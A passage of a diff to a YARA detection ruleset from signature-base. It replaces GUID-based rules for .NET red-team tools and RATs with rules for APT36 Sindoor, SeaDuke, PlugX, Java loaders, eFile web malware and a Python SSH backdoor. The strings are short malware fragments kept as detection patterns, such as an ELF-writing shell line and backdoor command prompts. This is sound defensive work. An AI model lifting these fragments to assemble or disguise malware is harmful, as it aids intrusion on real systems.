+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt36_operation_sindoor.yar#L18-L34"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "8953751277594d4075907e8371764d02307209a732bb05d7cfec8141e23c7765"
-		score = 75
+		hash = "9943bdf1b2a37434054b14a1a56a8e67aaa6a8b733ca785017d3ed8c1173ac59"
+		logic_hash = "1549aac3132c5f3e73d984c3404a5530507e967df4ab6d5ccd408abc874a5306"
+		score = 70
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "daedf7b3-8262-4892-adc4-425dd5f85bca" ascii wide
+		$hdr = "[Desktop Entry]"
+		$s1 = "printf '\\\\x7FELF' | dd of"
+		$s2 = "Future_Note_Warfare_OpSindoor.pdf"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 100KB and $hdr and any of ( $s* )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpwifigrabber : FILE
+rule SIGNATURE_BASE_MAL_Sindoor_Decryptor_Aug25 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "1a457672-743c-56f0-a4d7-6c25f9ce2345"
-		date = "2020-12-29"
-		modified = "2025-08-15"
-		reference = "https://github.com/r3nhat/SharpWifiGrabber"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3803-L3816"
+		description = "Detects AES decryptor used by Sindoor dropper related to APT 36"
+		author = "Pezier Pierre-Henri"
+		id = "e79c4eef-b8ee-5ad6-b0dd-d021c5e6b62a"
+		date = "2025-08-29"
+		modified = "2025-09-02"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt36_operation_sindoor.yar#L36-L60"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "6984510cbc43987fee53e5b164d973f56ecdd682d9263dc7cf560ab8728769d9"
-		score = 75
+		hash = "9a1adb50bb08f5a28160802c8f315749b15c9009f25aa6718c7752471db3bb4b"
+		logic_hash = "4172fd9aee39a1a0681483f6dada6394debc62149a588ab4807e3016a823bed3"
+		score = 80
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "c0997698-2b73-4982-b25b-d0578d1323c2" ascii wide
+		$s1 = "Go build"
+		$s2 = "main.rc4EncryptDecrypt"
+		$s3 = "main.processFile"
+		$s4 = "main.deriveKeyAES"
+		$s5 = "use RC4 instead of AES"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 100MB and ( uint16( 0 ) == 0x5a4d or uint32be( 0 ) == 0x7f454c46 or ( uint32be( 0 ) == 0xcafebabe and uint32be( 4 ) < 0x20 ) or uint32( 0 ) == 0xfeedface or uint32( 0 ) == 0xfeedfacf ) and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpmapexec : FILE
+rule SIGNATURE_BASE_MAL_Sindoor_Downloader_Aug25 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "b4922734-a486-5c4d-9bd7-5146cfecbf01"
-		date = "2020-12-29"
-		modified = "2025-08-15"
-		reference = "https://github.com/cube0x0/SharpMapExec"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3818-L3831"
+		description = "Detects Sindoor downloader related to APT 36"
+		author = "Pezier Pierre-Henri"
+		id = "9fbf4e4f-3a49-5ed9-af1b-7c3fbfdc5ef2"
+		date = "2025-08-29"
+		modified = "2025-09-02"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt36_operation_sindoor.yar#L62-L86"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "cc155390b8c739b7c96f45b79a8a078128528d6c7d070161d67484880c51a714"
-		score = 75
+		hash = "38b6b93a536cbab5c289fe542656d8817d7c1217ad75c7f367b15c65d96a21d4"
+		logic_hash = "c55be65cd077cb04b625636dffcb02af74efa06bb49da734c8616da233a34d1a"
+		score = 80
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "bd5220f7-e1fb-41d2-91ec-e4c50c6e9b9f" ascii wide
+		$s1 = "Go build"
+		$s2 = "main.downloadFile.deferwrap"
+		$s3 = "main.decrypt"
+		$s4 = "main.HiddenHome"
+		$s5 = "main.RealCheck"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 100MB and ( uint16( 0 ) == 0x5a4d or uint32be( 0 ) == 0x7f454c46 or ( uint32be( 0 ) == 0xcafebabe and uint32be( 4 ) < 0x20 ) or uint32( 0 ) == 0xfeedface or uint32( 0 ) == 0xfeedfacf ) and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_K8Fly : FILE
+rule SIGNATURE_BASE_Seaduke_Sample : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "3421e6fb-df65-5e2e-ae46-37f9c763c6a1"
-		date = "2020-12-29"
-		modified = "2025-08-15"
-		reference = "https://github.com/zzwlpx/k8fly"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3833-L3846"
+		description = "SeaDuke Malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "011a303b-b051-519f-9687-668c9bcd15ca"
+		date = "2015-07-14"
+		modified = "2023-12-05"
+		reference = "http://goo.gl/MJ0c2M"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_seaduke_unit42.yar#L10-L28"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "99fb07cefac5572180f5f66e9ebce39b8d17c3a2acc56dd8fea426452127be5a"
-		score = 75
+		hash = "d2e570129a12a47231a1ecb8176fa88a1bf415c51dabd885c513d98b15f75d4e"
+		logic_hash = "3bec2bedaafddd17ee65747f8be773287eda784bdfa8fc11e8378737139ef94e"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "13b6c843-f3d4-4585-b4f3-e2672a47931e" ascii wide
+		$s0 = "bpython27.dll" fullword ascii
+		$s1 = "email.header(" ascii
+		$s2 = "LogonUI.exe" fullword wide
+		$s3 = "Crypto.Cipher.AES(" ascii
+		$s4 = "mod is NULL - %s" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 4000KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Stealer : FILE
+rule SIGNATURE_BASE_Apt_Backspace : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "c721a0ac-e898-52aa-9bdf-a19bc0bd783d"
-		date = "2020-12-29"
-		modified = "2025-08-15"
-		reference = "https://github.com/malwares/Stealer"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3848-L3863"
+		description = "Detects APT backspace"
+		author = "Bit Byte Bitten"
+		id = "3da3337d-b6d3-5661-b43e-535e06817303"
+		date = "2015-05-14"
+		modified = "2023-12-05"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_backspace.yar#L6-L19"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "37f829449b4f8a9524400d9409b985fab2ff70024a88fdd96ba391956a3398e3"
+		hash = "6cbfeb7526de65eb2e3c848acac05da1e885636d17c1c45c62ad37e44cd84f99"
+		logic_hash = "6fa86ada5c965bd9c199c2a1cf9b691499a3d423da7db50c8987b6725c0c0f29"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "8fcd4931-91a2-4e18-849b-70de34ab75df" ascii wide
-		$typelibguid1lo = "e48811ca-8af8-4e73-85dd-2045b9cca73a" ascii wide
-		$typelibguid2lo = "d3d8a1cc-e123-4905-b3de-374749122fcf" ascii wide
+		$s1 = "!! Use Splice Socket !!"
+		$s2 = "User-Agent: SJZJ (compatible; MSIE 6.0; Win32)"
+		$s3 = "g_nAV=%d,hWnd:0x%X,className:%s,Title:%s,(%d,%d,%d,%d),BOOL=%d"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Porttran : FILE
+rule SIGNATURE_BASE_Korplug_FAST : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "844e58a2-54f5-51e8-8176-6a478a136603"
-		date = "2020-12-29"
-		modified = "2025-08-15"
-		reference = "https://github.com/k8gege/PortTran"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3865-L3879"
+		description = "Rule to detect Korplug/PlugX FAST variant"
+		author = "Florian Roth (Nextron Systems)"
+		id = "85c6c460-2902-5bfa-be58-a2b62e3b882e"
+		date = "2015-08-20"
+		modified = "2023-12-05"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_korplug_fast.yar#L1-L27"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "f8417a677e88bd923236855d6734cbf3db864c7e3ea60a1e500554fc5946f76a"
+		hash = "c437465db42268332543fbf6fd6a560ca010f19e0fd56562fb83fb704824b371"
+		logic_hash = "31aeb634eecc0f93353432b0dde113bfb54810ea74b02f959447a1d42e7e9e1b"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "3a074374-77e8-4312-8746-37f3cb00e82c" ascii wide
-		$typelibguid1lo = "67a73bac-f59d-4227-9220-e20a2ef42782" ascii wide
+		$x1 = "%s\\rundll32.exe \"%s\", ShadowPlay" fullword ascii
+		$a1 = "ShadowPlay" fullword ascii
+		$s1 = "%s\\rundll32.exe \"%s\"," fullword ascii
+		$s2 = "nvdisps.dll" fullword ascii
+		$s3 = "%snvdisps.dll" fullword ascii
+		$s4 = "\\winhlp32.exe" ascii
+		$s5 = "nvdisps_user.dat" fullword ascii
+		$s6 = "%snvdisps_user.dat" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 500KB and ( $x1 or ( $a1 and 1 of ( $s* ) ) or 4 of ( $s* ) )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Gray_Keylogger_2 : FILE
+rule SIGNATURE_BASE_SUSP_Scheduled_Task_Java_JAR_Aug25 : FILE
 {
 	meta:
-		description = "Detects VB.NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "40ab8103-9151-5a5c-8b70-ab3bfd3896f9"
-		date = "2020-12-30"
-		modified = "2025-08-15"
-		reference = "https://github.com/graysuit/gray-keylogger-2"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3882-L3896"
+		description = "Detects scheduled tasks that execute Java JAR files, which is suspicious but not necessarily malicious"
+		author = "Florian Roth"
+		id = "241d921e-7548-5f9e-ae9b-9a7d7cfa5e03"
+		date = "2025-08-07"
+		modified = "2025-08-08"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_soupdealer_java_aug25.yar#L1-L23"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "92ab6b703064beeab4ef6811732ee76d187958bf4b16f70fa062a7a71ecfb289"
-		score = 75
+		hash = "7c5999082d9c5f3dd342ca05191311ddd1e24ba7675d1e9763fb4d962be3a933"
+		logic_hash = "fc8e72dbc6133ca27cfd35bb952c32be3a75d0485558915f9ea49fc8fd8c5719"
+		score = 60
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "e94ca3ff-c0e5-4d1a-ad5e-f6ebbe365067" ascii wide
-		$typelibguid1lo = "1ed07564-b411-4626-88e5-e1cd8ecd860a" ascii wide
+		$a0 = "<Task version=" wide
+		$a1 = "xmlns=\"http://schemas.microsoft.com/windows/" wide
+		$sa1 = "java.exe</Command>" wide
+		$sa2 = "javaw.exe</Command>" wide
+		$sb1 = "<Arguments>-jar " wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0xfeff and filesize < 500KB and all of ( $a* ) and 1 of ( $sa* ) and 1 of ( $sb* )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Lime_Miner : FILE
+rule SIGNATURE_BASE_SUSP_JAVA_Loader_Indicators_Aug25 : FILE
 {
 	meta:
-		description = "Detects VB.NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "d0631817-10a2-55bf-a41d-226fa0dcb9f9"
-		date = "2020-12-30"
-		modified = "2025-08-15"
-		reference = "https://github.com/NYAN-x-CAT/Lime-Miner"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3898-L3911"
+		description = "Detects indicators of a Java loader used in phishing campaigns"
+		author = "Florian Roth"
+		id = "e0b386ff-aea3-5311-8d0e-e97b6e64e340"
+		date = "2025-08-07"
+		modified = "2025-08-08"
+		reference = "https://www.malwation.com/blog/technical-analysis-of-a-stealth-java-loader-used-in-phishing-campaigns-targeting-turkiye"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_soupdealer_java_aug25.yar#L25-L43"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "4b7f810efd907477736f40b9537d1ad99896e28c89bd571244256c385c387bfa"
-		score = 75
+		logic_hash = "ac610cd6d3030f49058d5e6f059b746cf3da05ca3cdc8f2be2f5f1cfec2ff665"
+		score = 70
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "c4cf746fce283878dde567e5457a8ebdbb7ff3414be46569ecdd57338bd96fa1"
 
 	strings:
-		$typelibguid0lo = "13958fb9-dfc1-4e2c-8a8d-a5e68abdbc66" ascii wide
+		$s1 = "Loader.classPK" ascii fullword
+		$s2 = "stubPK" ascii
+		$s3 = "META-INF/MANIFEST.MFPK" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x4b50 and filesize < 500KB and $s1 in ( filesize - 224 .. filesize ) and $s2 in ( filesize - 224 .. filesize ) and $s3 in ( filesize - 224 .. filesize )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Blacknet : FILE
+rule SIGNATURE_BASE_MAL_JAVA_Loader_Final_Jar_Aug25
 {
 	meta:
-		description = "Detects VB.NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "9fbb3c11-7b11-5910-9c8b-247aeefbaa87"
-		date = "2020-12-30"
-		modified = "2025-08-15"
-		reference = "https://github.com/BlackHacker511/BlackNET"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3913-L3929"
+		description = "Detects a final Java loader JAR file used in phishing campaigns"
+		author = "Florian Roth"
+		id = "ae4202a5-89ab-54d2-ac96-f98d338b96ba"
+		date = "2025-08-07"
+		modified = "2025-08-08"
+		reference = "https://www.malwation.com/blog/technical-analysis-of-a-stealth-java-loader-used-in-phishing-campaigns-targeting-turkiye"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_soupdealer_java_aug25.yar#L45-L60"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "5e3c6e6e50888c942d541ad893b34c65f784614de7576e9a752822c433753d55"
-		score = 75
+		logic_hash = "743e7e12afd949aacbbfcfc62b13d4e65b7011ca4301b37b71bc8032f96aff20"
+		score = 85
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
+		hash1 = "0a7fddd91b332c8daee2c0727b884fc92cfaede02883dbad75f7efc299e884e3"
 
 	strings:
-		$typelibguid0lo = "c2b90883-abee-4cfa-af66-dfd93ec617a5" ascii wide
-		$typelibguid1lo = "8bb6f5b4-e7c7-4554-afd1-48f368774837" ascii wide
-		$typelibguid2lo = "983ae28c-91c3-4072-8cdf-698b2ff7a967" ascii wide
-		$typelibguid3lo = "9ac18cdc-3711-4719-9cfb-5b5f2d51fd5a" ascii wide
+		$s1 = "Obfuscation by Allatori Obfuscator" ascii fullword
+		$s2 = "MANIFEST.MFM" ascii fullword
+		$s3 = "GetCpu.classPK" ascii fullword
+		$s4 = "extra/spreader" ascii fullword
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Plasmarat : FILE
+rule SIGNATURE_BASE_SUSP_JAVA_Class_Allatori_Obfuscator_Aug25 : FILE
 {
 	meta:
-		description = "Detects VB.NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "13362cba-f9b2-50c8-95cc-504e585bdd42"
-		date = "2020-12-30"
-		modified = "2025-08-15"
-		reference = "https://github.com/mwsrc/PlasmaRAT"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3931-L3945"
+		description = "Detects a relatively small Java class file obfuscated by Allatori Obfuscator"
+		author = "Florian Roth"
+		id = "30c90de5-dcd7-5cf3-8116-ff6f384c2ebc"
+		date = "2025-08-07"
+		modified = "2025-08-08"
+		reference = "https://www.malwation.com/blog/technical-analysis-of-a-stealth-java-loader-used-in-phishing-campaigns-targeting-turkiye"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_soupdealer_java_aug25.yar#L62-L76"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "78d0da86cdef86b06fca37fb378297df26ca792ab6069e87c19c7b075687b07d"
-		score = 75
+		logic_hash = "981ae619526e3f90618884d133d565630320419ad4b9c75737708c864fac8365"
+		score = 50
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "0a7fddd91b332c8daee2c0727b884fc92cfaede02883dbad75f7efc299e884e3"
 
 	strings:
-		$typelibguid0lo = "b8a2147c-074c-46e1-bb99-c8431a6546ce" ascii wide
-		$typelibguid1lo = "0fcfde33-213f-4fb6-ac15-efb20393d4f3" ascii wide
+		$x1 = "Obfuscation by Allatori Obfuscator" ascii fullword
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x4b50 and filesize < 500KB and $x1
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Lime_RAT : FILE
+rule SIGNATURE_BASE_MAL_JS_Efile_Apr23_1
 {
 	meta:
-		description = "Detects VB.NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "31a0e9ca-9da1-557a-bcc5-1351fa90a0e1"
-		date = "2020-12-30"
-		modified = "2025-08-15"
-		reference = "https://github.com/NYAN-x-CAT/Lime-RAT"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3947-L3980"
+		description = "Detects JavaScript malware used in eFile compromise"
+		author = "Florian Roth"
+		id = "ba7a8b2c-789c-5bc5-be53-f2b92c7039e1"
+		date = "2023-04-06"
+		modified = "2023-12-05"
+		reference = "https://twitter.com/Ax_Sharma/status/1643178696084271104/photo/1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_efile_apr23.yar#L2-L15"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "eee41a29dc6b336c14abedaad767b8a0a529917bbc9096829114f302ed93f53c"
+		logic_hash = "6d94162e5719b92d9df349e7d48cd70e218998b0e120870a435a8073fa49c532"
 		score = 75
-		quality = 83
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		quality = 85
+		tags = ""
 
 	strings:
-		$typelibguid0lo = "e58ac447-ab07-402a-9c96-95e284a76a8d" ascii wide
-		$typelibguid1lo = "8fb35dab-73cd-4163-8868-c4dbcbdf0c17" ascii wide
-		$typelibguid2lo = "37845f5b-35fe-4dce-bbec-2d07c7904fb0" ascii wide
-		$typelibguid3lo = "83c453cf-0d29-4690-b9dc-567f20e63894" ascii wide
-		$typelibguid4lo = "8b1f0a69-a930-42e3-9c13-7de0d04a4add" ascii wide
-		$typelibguid5lo = "eaaeccf6-75d2-4616-b045-36eea09c8b28" ascii wide
-		$typelibguid6lo = "5b2ec674-0aa4-4209-94df-b6c995ad59c4" ascii wide
-		$typelibguid7lo = "e2cc7158-aee6-4463-95bf-fb5295e9e37a" ascii wide
-		$typelibguid8lo = "d04ecf62-6da9-4308-804a-e789baa5cc38" ascii wide
-		$typelibguid9lo = "8026261f-ac68-4ccf-97b2-3b55b7d6684d" ascii wide
-		$typelibguid10lo = "212cdfac-51f1-4045-a5c0-6e638f89fce0" ascii wide
-		$typelibguid11lo = "c1b608bb-7aed-488d-aa3b-0c96625d26c0" ascii wide
-		$typelibguid12lo = "4c84e7ec-f197-4321-8862-d5d18783e2fe" ascii wide
-		$typelibguid13lo = "3fc17adb-67d4-4a8d-8770-ecfd815f73ee" ascii wide
-		$typelibguid14lo = "f1ab854b-6282-4bdf-8b8b-f2911a008948" ascii wide
-		$typelibguid15lo = "aef6547e-3822-4f96-9708-bcf008129b2b" ascii wide
-		$typelibguid16lo = "a336f517-bca9-465f-8ff8-2756cfd0cad9" ascii wide
-		$typelibguid17lo = "5de018bd-941d-4a5d-bed5-fbdd111aba76" ascii wide
-		$typelibguid18lo = "bbfac1f9-cd4f-4c44-af94-1130168494d0" ascii wide
-		$typelibguid19lo = "1c79cea1-ebf3-494c-90a8-51691df41b86" ascii wide
-		$typelibguid20lo = "927104e1-aa17-4167-817c-7673fe26d46e" ascii wide
+		$s1 = "let payload_chrome = "
+		$s2 = "else if (agent.indexOf(\"firefox"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Njrat : FILE
+rule SIGNATURE_BASE_MAL_PHP_Efile_Apr23_1
 {
 	meta:
-		description = "Detects VB.NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "2140d69e-fb15-50a2-ba85-b7c8293003fb"
-		date = "2020-12-30"
-		modified = "2025-08-15"
-		reference = "https://github.com/mwsrc/njRAT"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3982-L4000"
+		description = "Detects malware "
+		author = "Florian Roth"
+		id = "d663b38e-b082-5cf7-9853-f4685bf3a87b"
+		date = "2023-04-06"
+		modified = "2023-12-05"
+		reference = "https://twitter.com/malwrhunterteam/status/1642988428080865281?s=12&t=C0_T_re0wRP_NfKa27Xw9w"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_efile_apr23.yar#L18-L32"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "fc54c34e2d908e617781ffe8b4c5538304830cfec317ed2eab4157f72bbbf059"
+		logic_hash = "ec4ac3f5c19f506a70eacb5fe3173cc06bf20567bbc9a96f3b269910382e5fa2"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$typelibguid0lo = "5a542c1b-2d36-4c31-b039-26a88d3967da" ascii wide
-		$typelibguid1lo = "6b07082a-9256-42c3-999a-665e9de49f33" ascii wide
-		$typelibguid2lo = "c0a9a70f-63e8-42ca-965d-73a1bc903e62" ascii wide
-		$typelibguid3lo = "70bd11de-7da1-4a89-b459-8daacc930c20" ascii wide
-		$typelibguid4lo = "fc790ee5-163a-40f9-a1e2-9863c290ff8b" ascii wide
-		$typelibguid5lo = "cb3c28b2-2a4f-4114-941c-ce929fec94d3" ascii wide
+		$s1 = "mt_rand( 0, 0xffff ), mt_rand( 0, 0xffff )" ascii
+		$s2 = "C:\\\\ProgramData\\\\Browsers" ascii fullword
+		$s3 = "curl_https($api_url." ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Manager : FILE
+rule SIGNATURE_BASE_Custom_Ssh_Backdoor_Server
 {
 	meta:
-		description = "Detects .NET red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "eef65d2c-ddbc-50c3-a6a0-e7032a55e92d"
-		date = "2021-01-21"
-		modified = "2025-08-15"
-		reference = "https://github.com/TheWover/Manager"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4002-L4016"
+		description = "Custome SSH backdoor based on python and paramiko - file server.py"
+		author = "Florian Roth (Nextron Systems)"
+		id = "eccf705b-b2c3-5af6-ab86-70292089812b"
+		date = "2015-05-14"
+		modified = "2022-08-18"
+		reference = "https://goo.gl/S46L3o"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_backdoor_ssh_python.yar#L2-L17"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "3783108ecfa26ee1a8d0ecfced9e601a41a159777d56a237ae82ad7860b45d5f"
+		hash = "0953b6c2181249b94282ca5736471f85d80d41c9"
+		logic_hash = "7bb142b69a75003e8f26d462c0895a3d807d5c326684e83d756178a3b91669dc"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$typelibguid0lo = "dda73ee9-0f41-4c09-9cad-8215abd60b33" ascii wide
-		$typelibguid1lo = "6a0f2422-d4d1-4b7e-84ad-56dc0fd2dfc5" ascii wide
+		$s0 = "command= raw_input(\"Enter command: \").strip('n')" fullword ascii
+		$s1 = "print '[-] (Failed to load moduli -- gex will be unsupported.)'" fullword ascii
